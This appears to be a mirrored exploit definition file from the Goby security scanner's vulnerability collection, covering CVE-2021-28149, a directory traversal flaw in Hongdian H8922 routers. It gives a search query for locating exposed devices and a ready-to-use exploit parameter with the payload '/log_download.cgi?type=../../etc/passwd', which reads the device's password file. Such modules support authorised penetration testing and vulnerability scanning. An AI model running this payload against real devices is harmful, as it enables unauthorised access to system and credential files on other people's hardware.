mirror of https://github.com/qwqdanchun/Goby.git
39 lines
1.6 KiB
JSON
39 lines
1.6 KiB
JSON
{
|
|
"Name": "Hongdian H8922 Arbitrary File Read (CVE-2021-28149)",
|
|
"Description": "Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.",
|
|
"Product": "Hongdian-H8922",
|
|
"Homepage": "http://en.hongdian.com/Products/Details/H8922",
|
|
"DisclosureDate": "2021-05-06",
|
|
"Author": "1291904552@qq.com",
|
|
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/Hongdian/CVE-2021-28149/Hongdian_H8922_Arbitrary_File_Read_CVE_2021_28149.gif",
|
|
"GobyQuery": "banner=\"WWW-Authenticate: Basic realm=\" && banner=\"Server Status\"",
|
|
"Level": "2",
|
|
"Impact": "<p></p>",
|
|
"Recommandation": "",
|
|
"References": [
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2021-28149"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": [
|
|
{
|
|
"name": "filepath",
|
|
"type": "createSelect",
|
|
"value": "/log_download.cgi?type=../../etc/passwd,/backup2.cgi"
|
|
}
|
|
],
|
|
"ExpTips": null,
|
|
"ScanSteps": null,
|
|
"ExploitSteps": null,
|
|
"Tags": [
|
|
"fileread"
|
|
],
|
|
"CVEIDs": ["CVE-2021-28149"],
|
|
"CVSSScore": "6.5",
|
|
"AttackSurfaces": {
|
|
"Application": null,
|
|
"Support": null,
|
|
"Service": null,
|
|
"System": null,
|
|
"Hardware": ["Hongdian-H8922"]
|
|
}
|
|
} |